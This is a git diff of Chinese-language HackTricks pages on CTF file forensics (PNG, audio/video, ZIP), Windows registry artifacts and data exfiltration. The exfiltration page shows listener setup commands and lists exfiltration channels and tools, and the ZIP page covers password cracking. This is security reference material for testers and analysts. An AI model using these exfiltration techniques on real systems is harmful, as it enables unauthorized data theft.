💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md index e3989ad36..7cc503b4a 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/png-tricks.md @@ -1,33 +1,20 @@ -
- -从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) - -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 - -
- -**PNG文件**在**CTF挑战**中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像**Wireshark**这样的工具通过解剖网络数据包中的PNG文件数据,可以分析PNG文件,揭示嵌入的信息或异常。 - -为了检查PNG文件的完整性并修复损坏,**pngcheck**是一个关键工具,提供命令行功能来验证和诊断PNG文件([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像[OfficeRecovery的PixRecovery](https://online.officerecovery.com/pixrecovery/)这样的在线服务提供了一个基于Web的解决方案,用于**修复损坏的PNG文件**,帮助CTF参与者恢复关键数据。 - -这些策略强调了在CTF中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。 +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} + +**PNG 文件** 在 **CTF 挑战** 中备受推崇,因为它们具有**无损压缩**,非常适合嵌入隐藏数据。像 **Wireshark** 这样的工具通过解剖网络数据包中的 PNG 文件数据,可以分析 PNG 文件,揭示嵌入的信息或异常。 + +为了检查 PNG 文件的完整性并修复损坏,**pngcheck** 是一个关键工具,提供命令行功能来验证和诊断 PNG 文件 ([pngcheck](http://libpng.org/pub/png/apps/pngcheck.html))。当文件超出简单修复范围时,像 [OfficeRecovery's PixRecovery](https://online.officerecovery.com/pixrecovery/) 这样的在线服务提供了一个基于 Web 的解决方案,用于**修复损坏的 PNG 文件**,帮助 CTF 参与者恢复关键数据。 + +这些策略强调了在 CTF 中采用综合方法的重要性,利用分析工具和修复技术的结合来揭示和恢复隐藏或丢失的数据。 diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md index 1fbac1c16..bf2fbc2f6 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/video-and-audio-file-analysis.md @@ -1,41 +1,42 @@ +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -**音频和视频文件处理**是CTF取证挑战中的基本技术,利用**隐写术**和元数据分析来隐藏或揭示秘密消息。工具如**[mediainfo](https://mediaarea.net/en/MediaInfo)**和**`exiftool`**对检查文件元数据和识别内容类型至关重要。 +**音频和视频文件处理** 是 **CTF 取证挑战** 中的基本技术,利用 **隐写术** 和元数据分析来隐藏或揭示秘密信息。工具如 **[mediainfo](https://mediaarea.net/en/MediaInfo)** 和 **`exiftool`** 对检查文件元数据和识别内容类型至关重要。 -对于音频挑战,**[Audacity](http://www.audacityteam.org/)**是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)**强烈推荐用于详细的频谱图分析。**Audacity**允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**是一个命令行实用程序,擅长转换和编辑音频文件。 +对于音频挑战,**[Audacity](http://www.audacityteam.org/)** 是一个优秀的工具,可用于查看波形和分析频谱图,有助于揭示音频中编码的文本。**[Sonic Visualiser](http://www.sonicvisualiser.org/)** 强烈推荐用于详细的频谱图分析。**Audacity** 允许对音频进行操作,如减慢或倒放音轨以检测隐藏的消息。**[Sox](http://sox.sourceforge.net/)**,一个命令行实用程序,擅长转换和编辑音频文件。 -**最低有效位(LSB)**操作是音频和视频隐写术中常见的技术,利用媒体文件的固定大小块来隐匿地嵌入数据。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)**对解码隐藏为**DTMF音调**或**莫尔斯电码**的消息很有用。 +**最低有效位(LSB)** 操作是音频和视频隐写术中常见的技术,利用媒体文件的固定大小块来隐匿地嵌入数据。**[Multimon-ng](http://tools.kali.org/wireless-attacks/multimon-ng)** 用于解码隐藏为 **DTMF 信号** 或 **莫尔斯电码** 的消息。 -视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)**是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)**将FFmpeg的功能集成到Python中,实现高级可脚本化交互。 +视频挑战通常涉及捆绑音频和视频流的容器格式。**[FFmpeg](http://ffmpeg.org/)** 是分析和处理这些格式的首选工具,能够解复用和回放内容。对于开发人员,**[ffmpy](http://ffmpy.readthedocs.io/en/latest/examples.html)** 将 FFmpeg 的功能集成到 Python 中,实现高级可脚本化交互。 -这些工具的组合突显了CTF挑战中所需的多功能性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中的隐藏数据。 +这些工具的组合突显了在 CTF 挑战中所需的多样性,参与者必须运用广泛的分析和处理技术来揭示音频和视频文件中隐藏的数据。 -# 参考资料 +## 参考资料 * [https://trailofbits.github.io/ctf/forensics/](https://trailofbits.github.io/ctf/forensics/) - + +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查 [**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md index 520cf47d3..16ffc1a6b 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/specific-software-file-type-tricks/zips-tricks.md @@ -1,30 +1,46 @@ # ZIP技巧 +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们独家的[**NFTs**](https://opensea.io/collection/the-peass-family)收藏品 -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**. +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
+{% endhint %} -用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用工具: +用于管理**zip文件**的**命令行工具**对于诊断、修复和破解zip文件至关重要。以下是一些关键的实用程序: - **`unzip`**:显示zip文件无法解压缩的原因。 - **`zipdetails -v`**:提供zip文件格式字段的详细分析。 - **`zipinfo`**:列出zip文件的内容而不解压缩它们。 - **`zip -F input.zip --out output.zip`** 和 **`zip -FF input.zip --out output.zip`**:尝试修复损坏的zip文件。 -- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长达约7个字符的密码有效。 +- **[fcrackzip](https://github.com/hyc/fcrackzip)**:用于暴力破解zip密码的工具,对长度约为7个字符的密码非常有效。 -[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的详细信息。 +[Zip文件格式规范](https://pkware.cachefly.net/webdocs/casestudies/APPNOTE.TXT)提供了关于zip文件的结构和标准的全面细节。 -值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**的影响。这种攻击利用已知内容来破解zip文件的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件不受这种明文攻击的影响,突显了为敏感数据选择安全加密方法的重要性。 +值得注意的是,受密码保护的zip文件**不会加密**其中的文件名或文件大小,这是与RAR或7z文件不同的安全漏洞,后者会加密这些信息。此外,使用较旧的ZipCrypto方法加密的zip文件如果存在未加密的压缩文件副本,则容易受到**明文攻击**。这种攻击利用已知内容来破解zip的密码,这一漏洞在[HackThis的文章](https://www.hackthis.co.uk/articles/known-plaintext-attack-cracking-zip-files)中有详细说明,并在[这篇学术论文](https://www.cs.auckland.ac.nz/\~mike/zipattacks.pdf)中进一步解释。然而,使用**AES-256**加密的zip文件免疫于这种明文攻击,突显了为敏感数据选择安全加密方法的重要性。 -# 参考资料 +## 参考资料 * [https://michael-myers.github.io/blog/categories/ctf/](https://michael-myers.github.io/blog/categories/ctf/) + +{% hint style="success" %} +学习并练习AWS Hacking:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习GCP Hacking: [**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +支持 HackTricks + +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们**. +* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。 + +
+{% endhint %} diff --git a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md index a57966738..fd9dd56de 100644 --- a/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md +++ b/generic-methodologies-and-resources/basic-forensic-methodology/windows-forensics/interesting-windows-registry-keys.md @@ -2,20 +2,20 @@ ### 有趣的Windows注册表键 +{% hint style="success" %} +学习和实践AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
- +{% endhint %} ### **Windows版本和所有者信息** - 位于**`Software\Microsoft\Windows NT\CurrentVersion`**,您将找到Windows版本、服务包、安装时间以及注册所有者的名称。 @@ -31,7 +31,7 @@ `fsutil behavior set disablelastaccess 0` ### Windows版本和服务包 -- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复和有时新功能的更新。 +- **Windows版本**指示版本(例如,家庭版、专业版)及其发布(例如,Windows 10、Windows 11),而**服务包**是包含修复程序和有时新功能的更新。 ### 启用最后访问时间 - 启用最后访问时间跟踪允许您查看文件上次打开的时间,这对于取证分析或系统监控至关重要。 @@ -40,7 +40,7 @@ - 注册表中保存了大量关于网络配置的数据,包括**网络类型(无线、有线、3G)**和**网络类别(公共、私人/家庭、域/工作)**,这对于了解网络安全设置和权限至关重要。 ### 客户端端缓存(CSC) -- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制着如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。 +- **CSC**通过缓存共享文件的副本来增强离线文件访问。不同的**CSCFlags**设置控制如何以及哪些文件被缓存,影响性能和用户体验,特别是在网络连接不稳定的环境中。 ### 自启动程序 - 在各种`Run`和`RunOnce`注册表键中列出的程序会在启动时自动运行,影响系统启动时间,并有可能成为识别恶意软件或不需要的软件的关注点。 @@ -52,23 +52,23 @@ - 注册表中存储的有关USB设备的详细信息可以帮助跟踪连接到计算机的设备,可能将设备与敏感文件传输或未经授权访问事件联系起来。 ### 卷序列号 -- **卷序列号**对于跟踪特定文件系统实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。 +- **卷序列号**对于跟踪文件系统的特定实例至关重要,在需要在不同设备之间建立文件来源的取证场景中非常有用。 ### **关机详细信息** - 关机时间和计数(仅适用于XP)保存在**`System\ControlSet001\Control\Windows`**和**`System\ControlSet001\Control\Watchdog\Display`**中。 ### **网络配置** -- 有关详细网络接口信息,请参考**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。 +- 有关详细网络接口信息,请参阅**`System\ControlSet001\Services\Tcpip\Parameters\Interfaces{GUID_INTERFACE}`**。 - 首次和最后一次网络连接时间,包括VPN连接,在**`Software\Microsoft\Windows NT\CurrentVersion\NetworkList`**的各个路径下记录。 ### **共享文件夹** -- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定了离线文件的可用性。 +- 共享文件夹和设置位于**`System\ControlSet001\Services\lanmanserver\Shares`**。客户端端缓存(CSC)设置决定离线文件的可用性。 ### **自动启动的程序** - 类似**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Run`**和`Software\Microsoft\Windows\CurrentVersion`下的条目详细说明了设置为在启动时运行的程序。 -### **搜索和键入路径** -- 在注册表中,**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下跟踪了资源管理器搜索和键入的路径,分别为WordwheelQuery和TypedPaths。 +### **搜索和输入路径** +- 在注册表中跟踪的资源管理器搜索和输入路径分别位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer`**下的WordwheelQuery和TypedPaths中。 ### **最近文档和Office文件** - 访问的最近文档和Office文件记录在`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs`和特定Office版本路径中。 @@ -77,29 +77,30 @@ - MRU列表,指示最近的文件路径和命令,存储在`NTUSER.DAT`的各个`ComDlg32`和`Explorer`子键中。 ### **用户活动跟踪** -- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和最后运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。 +- 用户助手功能记录了详细的应用程序使用统计信息,包括运行次数和上次运行时间,位于**`NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count`**。 ### **Shellbags分析** -- 存储着文件夹访问详细信息的Shellbags存储在`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。 +- 存储着文件夹访问详细信息的Shellbags位于`USRCLASS.DAT`和`NTUSER.DAT`的`Software\Microsoft\Windows\Shell`下。使用**[Shellbag Explorer](https://ericzimmerman.github.io/#!index.md)**进行分析。 ### **USB设备历史** - **`HKLM\SYSTEM\ControlSet001\Enum\USBSTOR`**和**`HKLM\SYSTEM\ControlSet001\Enum\USB`**包含有关连接的USB设备的丰富详细信息,包括制造商、产品名称和连接时间戳。 - 可通过搜索`NTUSER.DAT`中的设备的**{GUID}**来确定与特定USB设备关联的用户。 - 可通过`System\MountedDevices`和`Software\Microsoft\Windows NT\CurrentVersion\EMDMgmt`分别追踪最后安装的设备及其卷序列号。 -本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易用。 +本指南总结了访问Windows系统上详细系统、网络和用户活动信息的关键路径和方法,旨在清晰易懂。 +{% hint style="success" %} +学习和实践AWS黑客:[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习和实践GCP黑客:[**HackTricks培训GCP红队专家(GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS&HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享黑客技巧。
+{% endhint %} diff --git a/generic-methodologies-and-resources/exfiltration.md b/generic-methodologies-and-resources/exfiltration.md index 85a4ab63d..557e005dd 100644 --- a/generic-methodologies-and-resources/exfiltration.md +++ b/generic-methodologies-and-resources/exfiltration.md @@ -1,20 +1,21 @@ # 数据泄露 +{% hint style="success" %} +学习并练习 AWS 黑客技术:[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +学习并练习 GCP 黑客技术:[**HackTricks 培训 GCP 红队专家 (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-从零开始学习AWS黑客技术,成为专家 htARTE(HackTricks AWS红队专家) +支持 HackTricks -支持HackTricks的其他方式: - -* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)! -* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com) -* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family) -* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**。** -* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。 +* 检查[**订阅计划**](https://github.com/sponsors/carlospolop)! +* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github 仓库提交 PR 来分享黑客技巧。**
+{% endhint %} -**Try Hard Security Group** +**Try Hard 安全团队**
@@ -22,11 +23,11 @@ *** -## 常见的白名单域名用于信息泄露 +## 常见被允许的域名用于泄露信息 -查看[https://lots-project.com/](https://lots-project.com/)以找到常见的可被滥用的白名单域名 +查看 [https://lots-project.com/](https://lots-project.com/) 以找到常见被允许的域名,可以被滥用 -## 复制\&粘贴Base64 +## 复制并粘贴 Base64 **Linux** ```bash @@ -127,7 +128,7 @@ app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443) pip3 install pyftpdlib python3 -m pyftpdlib -p 21 ``` -### FTP服务器(NodeJS) +### FTP 服务器 (NodeJS) ``` sudo npm install -g ftp-srv --save ftp-srv ftp://0.0.0.0:9876 --root /tmp @@ -189,73 +190,19 @@ Windows --- -## Exfiltration +### Exfiltration -### Techniques +Exfiltration is the unauthorized transfer of data from a target system. There are various methods to exfiltrate data from a compromised system, including: -1. **Exfiltration Over C2 Channel**: Utilize the existing command and control channel to exfiltrate data. +- **Email**: Sending data as email attachments to an external email address. +- **FTP**: Transferring data using the File Transfer Protocol to an external server. +- **DNS**: Sending data by encoding it within DNS requests to a controlled server. +- **HTTP/HTTPS**: Sending data over HTTP or HTTPS to a remote server. +- **Steganography**: Hiding data within other files or images to avoid detection. +- **Cloud Storage**: Uploading data to cloud storage services such as Dropbox or Google Drive. +- **Physical Media**: Copying data to removable storage devices like USB drives or external hard drives. -2. **Exfiltration Over Alternative Protocol**: Use alternative protocols such as DNS, ICMP, or HTTP to exfiltrate data. - -3. **Exfiltration Over Unencrypted Protocols**: Leverage unencrypted protocols like FTP, Telnet, or HTTP to exfiltrate data. - -4. **Exfiltration Over Encrypted Protocols**: Utilize encrypted protocols like HTTPS or SSH to exfiltrate data. - -5. **Exfiltration Over Ingress Filtering**: Bypass egress filtering by exfiltrating data over allowed ingress channels. - -### Tools - -- **Netcat**: A versatile networking utility for reading from and writing to network connections. - -- **PowerShell**: A task automation framework for configuring systems and automating tasks. - -- **Certutil**: Command-line utility for managing certificates. - -- **Bitsadmin**: A tool to create and manage transfer jobs using Background Intelligent Transfer Service (BITS). - -- **FTP**: File Transfer Protocol for transferring files between a client and server on a network. - -- **Wget**: A command-line utility for downloading files from the web. - -- **Curl**: A tool for transferring data with URLs. - -- **SMBClient**: A tool for accessing shared folders. - -- **RDP**: Remote Desktop Protocol for remote access to Windows systems. - -- **WMIC**: Command-line tool for Windows Management Instrumentation. 